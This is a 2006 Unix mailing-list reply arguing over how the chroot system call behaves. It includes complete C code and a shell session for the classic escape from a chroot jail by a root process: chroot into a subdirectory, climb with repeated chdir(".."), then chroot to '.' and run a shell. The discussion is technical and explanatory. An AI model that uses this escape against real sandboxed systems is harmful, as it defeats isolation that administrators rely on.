On Saturday September 23 2006 03:31, Amos Shapira wrote:
> On 23/09/06, Michael Vasiliev <[EMAIL PROTECTED]> wrote:
> > Not entirely correct, if you have some privileges, namely if you are
> > still a root user inside a chroot padded cell, you can easily break out
> > by moving up
>
> a root user can just create a device file and access any device
> through that, that's why you shouldn't give root access if you don't
> trust the user of the chroot jail.
No points. We weren't discussing that, we discussed how the chroot call works.
There are infinite number of things you can do with root access.
> > the tree with fchdir(open(".",O_RDONLY)), followed by a number of
> > chdir("..") and chrooting("."), eventually hitting the /. I think the BSD
> > version of
>
> Are you sure? Have you tried this?
Actually, I did something like that, about ten years ago. :) But don't tell
anyone, ok? ;)
> Here is what happens at the root of a chroot'ed directory:
> # ls -ldi . ..
> 2 drwxr-xr-x 22 root root 624 2006-06-08 17:49 .
> 2 drwxr-xr-x 22 root root 624 2006-06-08 17:49 ..
>
> Same directory outside chroot:
> # ls -ldi . ..
> 2 drwxr-xr-x 22 root root 624 2006-06-08 17:49 .
> 2 drwxr-xr-x 22 root root 4096 2006-08-26 10:25 ..
>
> I.e. the chroot environment will simulate the standard practice of
> "/.." == "/" (the "624" means the they are the same i-node)
Ok, they are on the same inode. I never claimed otherwise. And your point is?
If the chroot does not set the working directory of the calling program to the
chroot one, I don't even need the fchroot call.
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
int main()
{
int i;
mkdir("foo",0755);
chroot("foo");
for(i=0;i<255;i++) {
chdir("..");
}
chroot(".");
execl("/bin/sh","-i",NULL);
}
Works for me...
foo / # chroot /chroot /bin/bash
bash-3.1# ./bar
foo / # ls
bin boot chroot dev etc home lib lost+found mnt opt proc root sbin
sys tmp usr var
foo / #
Anyway, that example is sort of a classic spherical horse in vacuum, because I
have a shell(sic!) inside my jail.
--
Sincerely Yours,
Michael Vasiliev
.. Any resemblance between the above views and those of my employer, my
terminal, or the view out my window are purely coincidental. Any resemblance
between the above and my own views is non-deterministic. The question of the
existence of views in the absence of anyone to hold them is left as an
exercise for the reader. The question of the existence of the reader is left
as an exercise for the second god coefficient. (A discussion of
non-orthogonal, non-integral polytheism is beyond the scope of this article.)
=================================================================
To unsubscribe, send mail to [EMAIL PROTECTED] with
the word "unsubscribe" in the message body, e.g., run the command
echo unsubscribe | mail [EMAIL PROTECTED]
